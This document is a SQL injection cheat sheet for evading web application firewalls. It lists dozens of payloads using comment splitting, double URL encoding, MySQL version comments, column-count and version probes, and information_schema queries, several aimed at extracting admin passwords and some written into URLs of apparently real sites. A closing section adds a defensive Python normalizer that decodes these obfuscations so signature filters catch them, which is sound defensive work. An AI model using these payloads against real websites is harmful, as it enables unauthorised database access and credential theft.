Are Bypassing The WAF /select/ /1,2,3,4,5

The document contains examples of SQL injection payloads targeting various vulnerabilities like bypassing input validation, retrieving data from databases, detecting database versions, and bypassing web application firewalls. The payloads use techniques like SQL comments, encoding, concatenation and information schema tables to evade defenses. The goal is to extract sensitive information like user passwords or version details from backend databases.

'/**/UNION/**/SELECT/**/password/**/FROM/**/Users/**/WHERE/**/username/**/LIKE/**/'admin'--
'/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/**/OM/**/Users/**/WHE/**/RE/**/username/**/LIKE/**/'admin'--
'%2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/password%2f%2a*/FROM%2f%2a*/Users%2f%2a*/WHERE%2f%2a*/username%2f%2a*/LIKE%2f%2a*/'admin'--
'%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/password%252f%252a*/FROM%252f%252a*/Users%252f%252a*/WHERE%252f%252a*/username%252f%252a*/LIKE%252f%252a*/'admin'--

www.site.com/a.php?id=123 uNiOn All sEleCt/*We are bypassing the WAF*/select/**/1,2,3,4,5--
http://site.org.uk/News/view.php?id=-26/%2A%2A/union/%2A%2A/select/%2A%2A/1,2,3,4,5--
http://site.org.uk/News/view.php?id=-26%2F**%2Funion%2F**%2Fselect%2F**%2F1,2,3,4,5--
http://www.site.com/artigos-de-baralho-cigano.php?id=130+UnIoN+SeLselectECT+1,2,3,4,5,6,7,8,9--
www.[site].com/index.php?id=1+uni*on+sel*ect+1,2,3,4--+
site.vulnweb.com/showforum.asp?id=-1/* &id= */union/* &id= */select/* &id= */1,2--

/* &c= */
/* &b= */
/* &id= */
/*&q=*/
/*&prodID=*/
/*&abc=*/
q=select
union /* and b=*/ select
q=select/*&q=*/
q=*/from/*
q=select/*&q=*/name&q=password/*&q=*/
&b= */select+1,2 /?a=1+ union/* &b= */
q=*/name q=password/*
?id=1 /**/union/* &id= */select/* &id= */pwd/* &id= */from/* &id= */users

site.org.uk/News/view.php?id=-26+%0A%0Dunion%0A%0D+%0A%0Dselect%0A%0D+1,2,3,4,5

+and(/*!50000select*/ 1)=(/*!32302select*/
0x[long run of A elided])+
Example in
http://www.punjab-dj.com/music/song.php?cat=Punjabi&n==25799'+and(/*!50000select*/ 1)=(/*!32302select*/0x[long run of A elided])+ and 0 union select 1,version(),3,4,5,6,7,8,9--+

getting column number

+group+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100%23
+Order+By+100
-) order by 100--
') order by 100--
')order by 100%23%23
%')order by 100%23%23
Null' order by 100--+
'group by 100--
+group/**/by/**/100--
'group/**/by/**/100%23%23
+PROCEDURE ANALYSE()
+and (select * from pages)=(select 1)

bypassing union
+%0A/**//*!50000%55nIOn*//**/%0A/*!32302%53eLEct*/%0A+
=null%0A/**//*!50000%55nIOn*//**/%0A/*!32302%53eLEct*/%0A+
+union%23aa%0Aselect+
--%0Aunion--%0Aselect--%0A@tmp:=
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
+%2F**%2Funion%2F**%2Fselect+
+UnIoN+SeLselectECT+
+UNIunionON+SELselectECT+
+#uNiOn+#sEleCt+
+--+Union+--+Select+--+
+union+distinct+select+
+union+distinctROW+select+
+union+(sELect'1','2','3')
+union(((((((select(1),(2),(3))))))))
=(1)unIon(selEct(1),(2),(3))
+UnIoN/*&a=*/SeLeCT/*&a=*/
/**/union/* &id= */select/* &id= */
%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/
getting version

Version 5

Example :
www.site.eg/php?id=1/*!50094aaaa*/ error
www.site.eg/php?id=1/*!50095aaaa*/ no error
www.site.eg/php?id=1/*!50096aaaa*/ error
www.site.eg/php?id=1+and substring(version(),1,1)=5
www.site.eg/php?id=1+and substring(version(),1,1)=10
www.site.eg/php?id=1+AND MID(VERSION(),1,1) = '5';

version 4

Example :
www.site.eg/php?id=1/*!40123 1=1*/--+- no error
www.site.eg/php?id=1/*!40122rrrr*/ no error
www.site.eg/php?id=1+and substring(version(),1,1)=4
www.site.eg/php?id=1+and substring(version(),1,1)=9
www.site.eg/php?id=1+AND MID(VERSION(),1,1) = '4';

Group & Concat

--%0ACoNcAt()
concat%00()
%00CoNcAt()
grOUp_ConCat(,0x3e,)
concat_ws(0x3a,)
CONCAT_WS(CHAR(32,58,32),version(),)
REVERSE(tacnoc)
binary(version())
uncompress(compress(version()))
aes_decrypt(aes_encrypt(version(),1),1)

Bypass with Information_schema.tables


There are many methods to bypass filters on information_schema.tables:
[1] Spaces
information_schema . tables
[2] Backticks
`information_schema`.`tables`
[3] Specific Code
/*!information_schema.tables*/
[4] Encoded
FROM+information_schema%20%0C%20.%20%09tables

[5] foo with `.`
(select+group_concat(table_name)`foo`+From+`information_schema`.`tAblES`+Where+table_ScHEmA=schEMA())
[6] Alternative Names
information_schema.statistics
information_schema.key_column_usage
information_schema.table_constraints
information_schema.partitions

Get tables

/*!50000table_name*/%0A/*!50000%46roM*/%0A/*!50000%49nfORmaTion_scHema . tAblES*/%0A/*!50000%57here*/%0Atable_ScHEmA=schEMA()%0Alimit%0A0,1

In tables directly

(/*!50000%53elect*/%0A/*!50000%54able_name*/%0A%0A/*!50000%46roM*/%0A/*!50000%49nfORmaTion_%53cHema . %54AblES*/%0A/*!50000%57here*/%0A%54able_ScHEmA=schEMA()%0Alimit%0A0,1)

Get Columns

/*!50000column_name*/%0A%46roM%0AInfORmaTion_scHema . cOlumnS%0A%57heRe%0A/*!50000tAblE_naMe*/=hex table
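As an added defensive example (not part of the original cheat sheet), the following Python normalizer shows what a filter has to do before pattern matching so that the obfuscations listed above (the "bypassing union" list and the information_schema variants) collapse back to the plain query they execute as: repeated URL decoding for the %25 double encoding, resolving MySQL `/*!NNNNN ... */` version comments to their body, treating ordinary comments both as whitespace and as nothing, dropping backticks and NUL bytes, and collapsing `%0A`/`%0D`/`%09`/`%0C` and the `information_schema . tables` spacing. The signature names and the sample inputs are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of a version comment, so keep it: /*!50000select*/ -> select
VERSION_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)        # /**/ and /* &id= */ fillers
LINE_COMMENT = re.compile(r"(--|#)[^\r\n]*")          # "--" or "#" to end of line
SIGNATURES = {  # constructed signature names for this example
    "union_select": re.compile(r"union[\s(]*(all|distinct(row)?)?[\s(]*select"),
    "information_schema": re.compile(
        r"information_schema\.(tables|columns|statistics|key_column_usage"
        r"|table_constraints|partitions)"),
    "version_probe": re.compile(r"@@version|version\(\)"),
}

def decode_fully(value: str, rounds: int = 3) -> str:
    """URL-decode until the text stops changing (catches %252f-style double encoding)."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def normalize(value: str, comment_as_space: bool) -> str:
    """One canonical view: decoded, lower-cased, comments resolved, backticks and
    NUL bytes dropped, %0A/%0D/%09/%0C and other whitespace collapsed to one space."""
    s = decode_fully(value).lower()
    s = VERSION_COMMENT.sub(r" \1 ", s)
    s = PLAIN_COMMENT.sub(" " if comment_as_space else "", s)
    s = LINE_COMMENT.sub(" ", s)
    s = s.replace("`", "").replace("\x00", "")
    s = re.sub(r"\s*\.\s*", ".", s)   # "information_schema . tables" -> "information_schema.tables"
    return re.sub(r"\s+", " ", s).strip()

def classify(value: str) -> list[str]:
    """Signature names that fire on either comment view: comments read as whitespace,
    or comments read as nothing (so the UN/**/ION split-keyword style is covered too)."""
    hits = set()
    for view in (normalize(value, True), normalize(value, False)):
        hits.update(name for name, rx in SIGNATURES.items() if rx.search(view))
    return sorted(hits)

if __name__ == "__main__":
    # Constructed inputs modelled on the obfuscation styles listed on this page.
    for sample in ("1%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/1,2",
                   "1 %0A/*!50000%55nIOn*//**/%0A/*!32302%53eLEct*/%0A 1,2",
                   "FROM+information_schema%20%0C%20.%20%09tables",
                   "the union of selected rows"):
        print(f"{sample!r:60} -> {classify(sample)}")
```

A raw-regex rule that looks for `union select` in the undecoded parameter matches none of the first three samples; after normalization all three are caught while the English sentence still passes.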
